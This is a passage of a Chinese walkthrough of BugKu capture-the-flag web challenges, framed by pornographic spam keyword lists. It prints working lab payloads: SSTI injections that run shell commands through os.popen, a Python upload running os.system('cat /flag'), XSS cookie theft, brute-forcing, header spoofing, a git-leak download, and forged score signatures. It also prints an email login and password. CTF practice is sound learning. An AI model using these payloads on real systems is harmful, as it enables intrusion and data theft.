日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

BugKu:Web

發布時間:2024/3/24 编程问答 24 豆豆
生活随笔 收集整理的這篇文章主要介紹了 BugKu:Web 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

BugKu:Web

    • Simple_SSTI_1
    • Flask_FileUpload
    • Simple_SSTI_2
    • 留言板
    • 矛盾
    • alert
    • 你必須讓他停下
    • 社工-初步收集
    • game1
    • 網站被黑
    • 本地管理員
    • bp
    • source
    • 源代碼

Simple_SSTI_1

1.根據題目提示使用flag構造參數,所以就是?flag={{XXXX}}

2.payload,查看config,得到flag

http://114.67.175.224:18349/?flag={{config}}

Flask_FileUpload

1.查看網頁源代碼,發現上傳的文件會通過Python 判斷是不是上傳的文件是不是jpg,png文件,并把執行的結果返回到,根據此編寫payload。

2.編寫python —payload,cat—查看目錄下的flag文件,并將文件保存為以jpg或png結尾的文件,上傳。

import os os.system('cat /flag')

3.顯示文件上傳成功,點擊F12查看,發現flag。

Simple_SSTI_2

1.在url后邊1輸入?falg,發現如下:
提示使用flag構造參數,所以就是?flag={{XXXX}}

2.查看config–
payload

?flag={{config.__class__.__init__.__globals__['os'].popen('ls ../').read()}}

得到如下文件目錄,如下圖

3.查看app bin dev etc home lib media mnt opt proc root run sbin srv sys tmp usr var 目錄下的文件
payload

?flag={{config.__class__.__init__.__globals__['os'].popen('ls ../app').read()}}

4.在目錄app下看到flag,使用cat命令查看flag內容,路徑為…/app/flag
payload

?flag={{config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read()}}

留言板

1.使用dirsearch 掃描目錄,發現 目錄/admin.php

python dirsearch.py -u http://114.67.175.224:10454



2.使用工具爆破,發現用戶名為admin,密碼為011be4d65feac1a8

登錄進去,發現留言的語句,在該目錄顯示,顯示當前的cookie------<script>alert(document.cookie)</script>

javascript:alert(document.cookie) 可以查看當前頁的cookie


3.刷新http://114.67.175.224:10454/admin.php頁面,顯示flag

矛盾

數字繞過,num既不能是數字字符,但是要等于1,用科學計數法表示數字1,既不是純數字,其值又等于1因此,構造payload:num=1*e*0.1

alert

F12查看,發現unicode碼—通過解碼得到flag

你必須讓他停下

通過burpsuite抓包,得到頁面每一幀的數據包,查看源代碼發現flag

wp:查看頁面源代碼,抓包,發送到Repeater,不停的發送數據包,在10.jpg發現flag。

社工-初步收集



通過郵箱登錄,用戶名:bugkuku@163.com;密碼:XSLROCPMNWWZQDZL
進入郵箱,查找flag

game1

開始游戲后,抓包,結束后發現GET /score.php?score=25&ip=39.144.69.22&sign=zMMjU=== HTTP/1.1


發送到repeater,修改score=99999,99999base64編碼為OTk5OTk=,修改sign=zMOTk5OTk===
‘zM’+base64(score)+‘==’

網站被黑

目錄掃描發現shell.php


爆破登錄密碼發現flag

本地管理員

查看頁面源代碼發現base64編碼dGVzdDEyMw==,解碼得到test123,用戶名為admin,密碼為test123,登錄

發現IP禁止訪問,請聯系本地管理員登陸,IP已被記錄.

抓包發送到repeater,添加------X-Forwarded-For: 127.0.0.1,發送,發現flag

bp

登錄界面,爆破,使用bp


發現如下-----輸入正確的密碼,返回頁面的r將不是{code: ‘bugku10000’}

intrude—選項,添加{code: ‘bugku10000’}

開始爆破密碼—找到返回包不含有{code: ‘bugku10000’}的,為正確的密碼:zxc123

登錄—發現flag

source

文件題目提示–方向可能為源代碼泄露
1.目錄掃描–發現git目錄----git泄露–如下圖
使用工具dirsearch–命令python dirsearch.py -u http://114.67.175.224:12145/

2.kali使用 wget 命令:wget是Linux中的一個下載文件的工具,-r :指定遞歸下載

wget -r http://114.67.175.224:12145/.git

下載完之后,生成114.67.175.224:12145文件夾,如下圖,進入到該目錄

cd 114.67.175.224:12145 ls 查看內容 git log 顯示提交日志 git reflog 顯示所有提交,包括孤立節點 查看內容 git show 40c6d51--發現flag

源代碼

查看題目源代碼–發現js代碼,以及url編碼的數據

<script> var p1 = '%66%75%6e%63%74%69%6f%6e%20%63%68%65%63%6b%53%75%62%6d%69%74%28%29%7b%76%61%72%20%61%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%70%61%73%73%77%6f%72%64%22%29%3b%69%66%28%22%75%6e%64%65%66%69%6e%65%64%22%21%3d%74%79%70%65%6f%66%20%61%29%7b%69%66%28%22%36%37%64%37%30%39%62%32%62'; var p2 = '%61%61%36%34%38%63%66%36%65%38%37%61%37%31%31%34%66%31%22%3d%3d%61%2e%76%61%6c%75%65%29%72%65%74%75%72%6e%21%30%3b%61%6c%65%72%74%28%22%45%72%72%6f%72%22%29%3b%61%2e%66%6f%63%75%73%28%29%3b%72%65%74%75%72%6e%21%31%7d%7d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%6c%65%76%65%6c%51%75%65%73%74%22%29%2e%6f%6e%73%75%62%6d%69%74%3d%63%68%65%63%6b%53%75%62%6d%69%74%3b'; eval(unescape(p1) + unescape('%35%34%61%61%32' + p2)); </script>

將p1,‘%35%34%61%61%32’,p2,url解碼拼接,作為輸入–得到flag

p1url解碼

p2url解碼

'%35%34%61%61%32’解碼:54aa2
三段解碼拼接得到;67d709b2b54aa2aa648cf6e87a7114f1

function checkSubmit() {var a=document.getElementById("password"); if("undefined"!=typeof a) {if("67d709b2b54aa2aa648cf6e87a7114f1"==a.value) return!0; alert("Error"); a.focus();return!1}} document.getElementById("levelQuest").onsubmit=checkSubmit;

總結

以上是生活随笔為你收集整理的BugKu:Web的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

主站蜘蛛池模板: 91免费视频播放 | 亚洲精品视频一区二区三区 | 久久国产视频播放 | 久久成人人人人精品欧 | 欧美香蕉在线 | 国产视频第三页 | 日本少妇videos高潮 | 国产精品69av| 国产成人一区二区三区影院在线 | 凹凸精品一区二区三区 | 国产成人精品一区二区无码呦 | 久一在线视频 | 99久久99久久| 中文字幕精品三级久久久 | 青青视频网站 | 亚洲国产综合在线 | 国产精品羞羞答答 | 亚洲欧洲精品一区二区三区 | 欧美成人短视频 | 午夜私人影院 | 久久久久国产 | 久久久久久国产精品免费免费 | 51妺嘿嘿午夜福利 | 精品国产乱码一区二区三区99 | 一区二区在线视频播放 | 日韩中文字幕有码 | 欧美三级a | 在线黄色观看 | 亚洲va久久久噜噜噜久久天堂 | 嫩草视频在线观看视频 | 手机av中文字幕 | 东京热一区二区三区四区 | 外国a级片| 国产精品一区二区在线观看 | 欧美激情在线 | 巨胸喷奶水www久久久免费动漫 | 天天摸天天做天天爽 | 成人激情久久 | 先锋影音av在线资源 | 性xxxxbbbb| 国产欧美一区二区三区在线看蜜臂 | 日本国产在线 | 91看片黄 | 免费吸乳羞羞网站视频 | 体内精69xxxxxx | 亚洲影视一区二区 | 亚洲网址 | 亚洲综合久久av一区二区三区 | 日本加勒比在线 | 久久精品国产精品 | 精品无码一区二区三区免费 | 少妇高潮毛片色欲ava片 | 激情网站免费 | 亚洲天天综合 | 成人国产视频在线观看 | 麻豆自拍偷拍 | 国产欧美一区二区三区国产幕精品 | 日本国产在线播放 | 国产成人三级一区二区在线观看一 | 已婚少妇美妙人妻系列 | 黄色一级片网站 | 九色精品在线 | 精品人妻无码一区二区性色 | 日韩有码在线视频 | 国产原创在线观看 | a级片毛片 | 日本十大三级艳星 | 国产理伦 | 国产欧美二区 | 亚洲欧美第一页 | 免费在线中文字幕 | 亚洲激情五月 | 午夜婷婷丁香 | 日本强好片久久久久久aaa | 欧洲成人av| 黄色二级视频 | 熟女丝袜一区 | 91日批视频| 无码久久av一区二区三区 | 亚洲aa在线观看 | 国产成人欧美一区二区三区的 | 精品久久五月天 | 成人免费av在线 | 一级一片免费播放 | 快灬快灬一下爽69 | 夜夜骚网站 | 午夜有码| av爽妇网 | 国内精品久久久久久久影视简单 | 日本一区二区三区成人 | 久久久久婷 | 国产又粗又猛又黄又爽无遮挡 | 美女福利网站 | 国产无遮挡又黄又爽免费网站 | 亚洲911精品成人18网站 | 黄色在线网站 | 国产精华一区二区三区 | 青青草国产在线 | 熟女视频一区二区三区 |